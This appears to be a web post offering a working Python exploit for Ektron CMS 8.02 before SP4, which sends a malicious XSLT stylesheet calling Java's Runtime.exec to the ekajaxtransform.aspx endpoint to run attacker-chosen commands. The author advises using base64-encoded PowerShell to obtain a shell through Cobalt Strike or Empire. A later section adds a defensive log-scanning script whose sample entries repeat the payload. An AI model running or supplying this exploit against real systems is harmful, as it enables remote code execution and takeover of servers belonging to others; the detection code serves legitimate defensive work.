
Ektron CMS 8.02 before SP4 Exploit

The exploit code is for Ektron CMS 8.02 before SP4 and is a very rough script to get you going.

If you find that Microsoft's XSLT processor has EnableScript set to False, meaning this Metasploit module does not work, then the exploit below may save some time:

#! /usr/bin/python
import httplib

target = raw_input("""Enter the domain or IP address of target: 
e.g. www.google.com, or 198.162.0.1:  """)
port = raw_input("""Enter port number of target 
e.g. 80 or 443:  """)
process = raw_input("""Enter the process you wish to run: 
powershell.exe or cmd.exe:  """)
command = raw_input("""Enter command you wish to run: 
e.g. ping 127.0.0.1:  """)


def printText(txt):
    lines = txt.split('\n')
    for line in lines:
        print line.strip()

httpServ = httplib.HTTPConnection( target, port)
httpServ.connect()

payload = """
xslt=<?xml version="1.0"?>
<xsl:stylesheet version="2.0" 
xmlns:xsl="http://www.w3.org/1999/XSL/Transform" 
xmlns:java="http://saxon.sf.net/java-type">
<xsl:template match="/">
<xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'%s /C %s')"
xmlns:Runtime="java:java.lang.Runtime"/>
</xsl:template>
</xsl:stylesheet>""" % (process,command)

headers = {"Content-type": "application/x-www-form-urlencoded; charset=UTF-8", "Accept": "application/x-www-form-urlencoded; charset=UTF-8"}

httpServ.request('POST', '/WorkArea/ContentDesigner/ekajaxtransform.aspx', payload, headers) 

response = httpServ.getresponse()
if response.status == httplib.OK:
    print "Java Process Id: "
    printText (response.read())

httpServ.close()

Just run the script and you will be prompted to enter the target, the process you wish to start, and the command you wish to run in that process.

I would recommend PowerShell.exe and a base64-encoded command to obtain a shell with Cobalt Strike, Empire, or whatever C2 you prefer.

Note: you do not need to put exclamation marks around your input when prompted.
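From the defender's side, the request shape above is easy to flag: a POST to ekajaxtransform.aspx whose xslt parameter carries a Java extension namespace, a Runtime:exec call, or an msxsl:script block (the script route that EnableScript gates). The following detection pass is an added example and not part of the original post; the "client method path status body" log format and the sample entries are constructed for illustration and assume a reverse proxy or WAF that records POST bodies.

```python
import re
from urllib.parse import unquote_plus

# Endpoint abused by the script on this page.
EKAJAX_PATH = "/WorkArea/ContentDesigner/ekajaxtransform.aspx"

# Markers of code execution inside a submitted stylesheet: Java extension
# namespaces (the Runtime:exec trick) and msxsl:script blocks (need EnableScript).
EXEC_PATTERNS = [
    re.compile(r'xmlns:\w+\s*=\s*["\']java:', re.I),
    re.compile(r'Runtime:exec|getRuntime\s*\(', re.I),
    re.compile(r'<msxsl:script\b', re.I),
]

# Constructed entries, "client method path status body"; the body field is
# assumed to come from a reverse proxy or WAF that logs POST bodies.
SAMPLE_LOG = """\
10.0.0.5 POST /WorkArea/ContentDesigner/ekajaxtransform.aspx 200 xslt=<?xml version="1.0"?><xsl:stylesheet version="2.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><xsl:value-of select="Runtime:exec(Runtime:getRuntime(),'cmd.exe /C ping 127.0.0.1')" xmlns:Runtime="java:java.lang.Runtime"/></xsl:template></xsl:stylesheet>
10.0.0.6 POST /WorkArea/ContentDesigner/ekajaxtransform.aspx 200 xslt=<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:template match="/"><p>hello</p></xsl:template></xsl:stylesheet>
10.0.0.7 POST /WorkArea/ContentDesigner/ekajaxtransform.aspx 200 xslt=%3Cxsl%3Astylesheet+xmlns%3Amsxsl%3D%22urn%3Aschemas-microsoft-com%3Axslt%22%3E%3Cmsxsl%3Ascript+language%3D%22C%23%22%3E...%3C%2Fmsxsl%3Ascript%3E%3C%2Fxsl%3Astylesheet%3E
10.0.0.8 GET /WorkArea/ContentDesigner/ekajaxtransform.aspx 200 -
10.0.0.9 POST /login.aspx 302 user=alice
"""


def parse_line(line):
    """Split one entry into its five fields; only the body may contain spaces."""
    fields = ("client", "method", "path", "status", "body")
    parts = line.split(maxsplit=4) + [""]  # default to an empty body
    return dict(zip(fields, parts)) if len(parts) >= 5 else None


def classify(entry):
    """'alert' for exec markers, 'review' for any other stylesheet upload."""
    if entry is None or entry["method"] != "POST" or entry["path"].lower() != EKAJAX_PATH.lower():
        return "ignore"
    body = unquote_plus(entry["body"])  # works for raw and form-encoded bodies
    if "xslt=" not in body:
        return "ignore"
    if any(p.search(body) for p in EXEC_PATTERNS):
        return "alert"
    return "review"


def scan(log_text):
    """Return (client, verdict) for every entry that is not ignored."""
    findings = []
    for entry in map(parse_line, log_text.splitlines()):
        verdict = classify(entry)
        if verdict != "ignore":
            findings.append((entry["client"], verdict))
    return findings
```

Any POST to this endpoint on an unpatched 8.02 install deserves a look, so benign-looking stylesheets are reported as "review" rather than dropped.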